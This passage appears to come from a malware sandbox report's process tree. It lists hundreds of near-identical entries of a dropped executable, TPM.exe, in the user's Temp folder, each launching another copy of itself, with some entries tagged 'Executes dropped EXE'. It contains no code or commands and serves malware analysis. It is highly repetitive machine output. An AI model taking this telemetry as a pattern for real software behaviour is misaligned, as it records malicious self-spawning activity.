    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:4336
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:2952
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:2940
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:3080
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:5000
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:4040
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:1896
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:4236
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:1976
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:4044
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:1552
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:3416
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:3504
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:1672
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:1760
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:2456
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:748
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:960
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:2016
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:4224
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:2728
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:4560
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:2220
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:2316
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:3632
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:3576
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:3588
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    - Executes dropped EXE
    PID:2148
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:3820
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:3824
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:2780
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:4952
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:3328
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:4272
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:2856
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:2184
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:4520
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:3692
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:4848
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5064
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:4488
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:2196
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:4308
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:4324
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:3248
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:1568
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5112
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:1948
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:4476
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:1492
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:4740
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:1416
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:4788
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:4048
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:1560
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:1472
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:4888
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:948
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:1884
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:2020
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:4408
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:4716
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:3160
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5020
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:4912
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:3776
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:4276
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:3792
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:3876
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:3252
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:4196
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:376
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:4868
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5100
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:4496
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:4300
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:4320
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:4404
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:4316
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:2840
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:4444
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:3596
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:4832
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:684
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:4064
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:2776
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:3192
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:848
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:3052
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:4184
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:1724
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:3464
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:4736
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:2620
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:3756
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:3720
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:4204
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:2396
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:3332
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:2136
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:1056
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:1184
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:908
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:2296
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:4076
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:1728
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:1900
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:4884
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:1476
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:4188
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:620
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:4836
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:1272
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:3432
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:400
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:1916
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:3168
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:2320
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:4108
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:3968
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5128
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5136
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5144
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5152
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5160
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5168
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5176
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5184
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5192
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5200
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5208
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5216
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5224
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5232
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5240
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5248
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5256
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5264
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5272
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5280
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5288
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5296
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5304
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5312
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5320
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5328
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5336
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5344
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5352
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5360
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5368
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5376
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5384
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5392
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5400
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5408
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5416
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5424
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5432
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5440
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5448
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5456
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5464
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5472
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5480
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5488
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5496
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5504
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5512
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5520
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5528
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5536
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5544
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5552
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5560
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5568
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5576
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5584
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5592
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5600
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5608
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5616
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5624
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5632
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5640
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5648
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5656
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5664
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5672
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5680
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5688
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5696
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5704
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5712
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5720
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5728
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5736
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5744
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5752
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5760
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5768
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5776
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5784
- - C:\Users\Admin\AppData\Local\Temp\TPM.exe
    C:\Users\Admin\AppData\Local\Temp\TPM.exe
    3⤵
    PID:5792
